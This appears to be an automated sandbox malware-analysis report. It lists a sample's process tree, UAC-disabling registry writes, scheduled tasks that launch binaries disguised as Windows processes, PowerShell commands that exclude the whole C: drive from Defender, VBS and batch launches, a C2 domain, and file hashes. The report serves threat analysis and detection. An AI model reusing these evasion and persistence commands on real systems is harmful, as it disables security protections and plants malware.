PID 1740 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\cmd.exe
PID 1740 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\cmd.exe
PID 1740 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\cmd.exe
PID 2040 wrote to memory of 1460 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\w32tm.exe
PID 2040 wrote to memory of 1460 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\w32tm.exe
PID 2040 wrote to memory of 1460 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\w32tm.exe
PID 2040 wrote to memory of 2868 N/A C:\Windows\System32\cmd.exe C:\Program Files\Windows Journal\ja-JP\smss.exe
PID 2040 wrote to memory of 2868 N/A C:\Windows\System32\cmd.exe C:\Program Files\Windows Journal\ja-JP\smss.exe
PID 2040 wrote to memory of 2868 N/A C:\Windows\System32\cmd.exe C:\Program Files\Windows Journal\ja-JP\smss.exe
PID 2868 wrote to memory of 2264 N/A C:\Program Files\Windows Journal\ja-JP\smss.exe C:\Windows\System32\WScript.exe
PID 2868 wrote to memory of 2264 N/A C:\Program Files\Windows Journal\ja-JP\smss.exe C:\Windows\System32\WScript.exe
PID 2868 wrote to memory of 2264 N/A C:\Program Files\Windows Journal\ja-JP\smss.exe C:\Windows\System32\WScript.exe
PID 2868 wrote to memory of 1656 N/A C:\Program Files\Windows Journal\ja-JP\smss.exe C:\Windows\System32\WScript.exe
PID 2868 wrote to memory of 1656 N/A C:\Program Files\Windows Journal\ja-JP\smss.exe C:\Windows\System32\WScript.exe
PID 2868 wrote to memory of 1656 N/A C:\Program Files\Windows Journal\ja-JP\smss.exe C:\Windows\System32\WScript.exe
PID 2264 wrote to memory of 2880 N/A C:\Windows\System32\WScript.exe C:\Program Files\Windows Journal\ja-JP\smss.exe
PID 2264 wrote to memory of 2880 N/A C:\Windows\System32\WScript.exe C:\Program Files\Windows Journal\ja-JP\smss.exe
PID 2264 wrote to memory of 2880 N/A C:\Windows\System32\WScript.exe C:\Program Files\Windows Journal\ja-JP\smss.exe
PID 2880 wrote to memory of 2008 N/A C:\Program Files\Windows Journal\ja-JP\smss.exe C:\Windows\System32\WScript.exe
PID 2880 wrote to memory of 2008 N/A C:\Program Files\Windows Journal\ja-JP\smss.exe C:\Windows\System32\WScript.exe
PID 2880 wrote to memory of 2008 N/A C:\Program Files\Windows Journal\ja-JP\smss.exe C:\Windows\System32\WScript.exe
PID 2880 wrote to memory of 2484 N/A C:\Program Files\Windows Journal\ja-JP\smss.exe C:\Windows\System32\WScript.exe
PID 2880 wrote to memory of 2484 N/A C:\Program Files\Windows Journal\ja-JP\smss.exe C:\Windows\System32\WScript.exe
PID 2880 wrote to memory of 2484 N/A C:\Program Files\Windows Journal\ja-JP\smss.exe C:\Windows\System32\WScript.exe
PID 2008 wrote to memory of 2156 N/A C:\Windows\System32\WScript.exe C:\Program Files\Windows Journal\ja-JP\smss.exe
PID 2008 wrote to memory of 2156 N/A C:\Windows\System32\WScript.exe C:\Program Files\Windows Journal\ja-JP\smss.exe
PID 2008 wrote to memory of 2156 N/A C:\Windows\System32\WScript.exe C:\Program Files\Windows Journal\ja-JP\smss.exe
PID 2156 wrote to memory of 2120 N/A C:\Program Files\Windows Journal\ja-JP\smss.exe C:\Windows\System32\WScript.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe

"C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Microsoft Synchronization Services\winlogon.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Synchronization Services\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Microsoft Synchronization Services\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Documents\My Music\sppsvc.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Users\Public\Documents\My Music\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Documents\My Music\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\csrss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows Sidebar\Gadgets\taskhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Sidebar\Gadgets\taskhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Sidebar\Gadgets\taskhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafNf" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Common Files\microsoft shared\Portal\1033\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\microsoft shared\Portal\1033\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafNf" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Common Files\microsoft shared\Portal\1033\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 6 /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\wininit.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 12 /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Photo Viewer\en-US\lsass.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files\Windows Photo Viewer\en-US\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Photo Viewer\en-US\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Photo Viewer\fr-FR\explorer.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\fr-FR\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Photo Viewer\fr-FR\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 8 /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\sppsvc.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 14 /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Journal\ja-JP\smss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files\Windows Journal\ja-JP\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Journal\ja-JP\smss.exe'" /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\0EpYUV7rVf.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Program Files\Windows Journal\ja-JP\smss.exe

"C:\Program Files\Windows Journal\ja-JP\smss.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\65d9c934-ccb1-46d4-ad81-cc05d426e2fb.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d0b27f55-043d-44d8-bb49-edac62daf534.vbs"

C:\Program Files\Windows Journal\ja-JP\smss.exe

"C:\Program Files\Windows Journal\ja-JP\smss.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ab0385af-7c65-4dd9-9fc7-3ce605066610.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\cbcca2ed-7ea8-467a-9075-05d3d0b2c47b.vbs"

C:\Program Files\Windows Journal\ja-JP\smss.exe

"C:\Program Files\Windows Journal\ja-JP\smss.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\37ce2d55-a30d-469a-b78d-d3f50b81ccab.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f65ebb41-f330-4227-a4db-dd87b85b1d37.vbs"

C:\Program Files\Windows Journal\ja-JP\smss.exe

"C:\Program Files\Windows Journal\ja-JP\smss.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e0801a69-6fb7-4a78-b405-de19841e11a0.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ffcb7729-47d1-461b-b79e-fb0db12ec5e6.vbs"

C:\Program Files\Windows Journal\ja-JP\smss.exe

"C:\Program Files\Windows Journal\ja-JP\smss.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e88acb5f-586f-432c-9bb6-a9335c637174.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4dd443ab-e86b-4fa4-aec4-72e66919eb98.vbs"

C:\Program Files\Windows Journal\ja-JP\smss.exe

"C:\Program Files\Windows Journal\ja-JP\smss.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\607d0094-c8cf-45b0-a489-eb60253042bd.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\dd9e8af2-4281-4529-8c47-352fa3587877.vbs"

C:\Program Files\Windows Journal\ja-JP\smss.exe

"C:\Program Files\Windows Journal\ja-JP\smss.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\eb67a883-7167-4851-8475-59ffe31fb9ca.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8bb3d616-48aa-44cb-92b7-bd0a22c819a2.vbs"

C:\Program Files\Windows Journal\ja-JP\smss.exe

"C:\Program Files\Windows Journal\ja-JP\smss.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d00a8001-25b8-4121-bf98-8ef2d7936fa1.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5269eb75-89ae-4f06-8216-f2ef54d4355d.vbs"

Network

Country Destination Domain Proto
US 8.8.8.8:53 81888.cllt.nyashteam.ru udp
US 104.21.2.8:80 81888.cllt.nyashteam.ru tcp
US 104.21.2.8:80 81888.cllt.nyashteam.ru tcp
US 104.21.2.8:80 81888.cllt.nyashteam.ru tcp
US 104.21.2.8:80 81888.cllt.nyashteam.ru tcp
US 104.21.2.8:80 81888.cllt.nyashteam.ru tcp
US 104.21.2.8:80 81888.cllt.nyashteam.ru tcp
US 104.21.2.8:80 81888.cllt.nyashteam.ru tcp

Files

C:\Program Files (x86)\Common Files\microsoft shared\Portal\1033\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe

MD5 362ac52b63b9f6608733e6da0f41b8a0
SHA1 4351bcc1035d37bc58f641fb58b08f80949f9129
SHA256 f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcaf
SHA512 8f60c2beb708deef5de53c33ee8224456ac9d9a7e3ad1eeacd786b79f2511342626910d5653b6870ea2a8c5448f6ca46ca6cfa09adb0ed1407812e7522771203

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 bbedad7ca0fa5a572e119667e15e8584
SHA1 925b231830aa6e67f0a131ffa811190176ad7f04
SHA256 0d2340ee9dbd88a977ea21db41d5f693b0e899d69f7212338d97f336077bc4b3
SHA512 daa4d57a726cdac8bc3c0819344f10a6d3c32cd5df24e548c90389c96ae211124675cf20daa0496d2dc3ff40ee7b485451ba9aab72ee487126a8837dd3815e4b

C:\Users\Admin\AppData\Local\Temp\0EpYUV7rVf.bat

MD5 bc04c7cfbce18199287c4cd8b51f4b66
SHA1 ce4c57f57ecee1666869e3b05ab379e931aad2cf
SHA256 f42697c6f2c8272a1d680d92bdbacc3afda90b1f8bb0aac7b9d1affd45967a08
SHA512 d47f7653cff12fc9c514b0a5c69daaa7445fd9d08b9f0255b64ce2505e16911a8f2cd0f5c0d9f81b53a8a6c5df077cbec103376830f658eccaf32e13871aa9cb

C:\Users\Admin\AppData\Local\Temp\65d9c934-ccb1-46d4-ad81-cc05d426e2fb.vbs

MD5 06a3ce8802cd79ab448caccbb11638be
SHA1 d65c73f3f8bc9470528e42b9c269fdba118c656d
SHA256 e89b65502b9f6aa15677b221c5f5c8a1adc705422d81d8d4f1b849ab732744b0
SHA512 b65cc16fe2d06a013c348c37dd5cc887ac1225373b416ba6217e845f2e0f528dc9a97c3a62febc594aea1aa9d29a3dfc59cff01906895f5f0cc614413670106b

